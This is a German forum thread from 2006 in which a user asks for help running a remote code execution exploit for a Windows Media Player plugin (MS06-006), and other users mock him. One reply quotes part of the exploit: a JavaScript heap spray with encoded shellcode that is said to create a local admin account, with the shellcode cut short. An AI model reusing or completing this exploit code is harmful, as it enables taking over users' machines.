#1 17. Februar 2006 Also, ich suche einen der weis wie dieser Exploit geht: http://www.frsirt.com/english/advisories/2006/0575 Ich habe vieles Versucht, aber es klappt bei mir net!!!!!!!! Eins is klar, der exploit sieht goil aus ^^ THX! (würde 10ner geben wenn ich könnte) + Multi-Zitat Zitieren
#2 17. Februar 2006 ^lol 1.) ... was genau ist dein problem ? 2.) nimmst du drogen ? was soll an diesem exploit geil aussehen...ausser 5 zeilen cmd ausgabe gibts da nix zu sehn -.- 3.) *hust* wofür den 10 ..sag mal was willst du überhaupt ? ich denk du hast keine ahnung was dieses exploit überhaupt kann / wie man es anwendet / und was überhaupt ne sicherheitslücke hat sondern willst nur irgendwelche server ownen um 100 mbitz du bauen mfg moep + Multi-Zitat Zitieren
#3 17. Februar 2006 ähm,.....das ist kein cmd source-code, scheint php oder sowas zu sein + Multi-Zitat Zitieren
#4 17. Februar 2006 Javascript passt besser.. (oder meinst du das Perl-Exploit) Denke mal dass moep sowas erkennt.. und damit den net user /add befehl gemeint hat welcher durch den Shellcode ausgeführt wird. + Multi-Zitat Zitieren
#8 17. Februar 2006 achso bin durch das hier ganz durcheinander gekommen Zitat: Zitat: Original von firetool ähm,.....das ist kein cmd source-code, scheint php oder sowas zu sein falsch..dann wäre ein <? am anfang + Multi-Zitat Zitieren
#10 17. Februar 2006 wenn ich nicht ganz falsch liege ist das hier doch das exploid oder ? @ Microsoft Windows Media Player Plugin Remote Code Execution Exploit (MS06-006) #2 var spray = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); do { spray += spray; } while (spray.length < 0x1000000); // If this is successful, you can login as a local admin: // // User: wmp0wn3d // Pass: password spray += unescape( "%uc933%ue983%ud9c9%ud9ee%u2474%u5bf4%u7381%u9713"+ "%u798c%u839b%ufceb%uf4e2%u646b%u9b3d%u8c97%udef2"+ "%u07ab%u9e05%u8def%u1096%u94d8%uc4f2%u8db7%ud292"+ "%ub81c%u9af2%ubd79%u02b91817%uacf3%uda56............"+ "%uc8d3%u9b79" ); </SCRIPT> bla bla + rest genau über dem exploid ist die ganze funktionsweise in leicht verständlichem englisch erklärt , wie und wo du das anwendest ist allerdings nicht beschrieben un das ist auch gut so. + Multi-Zitat Zitieren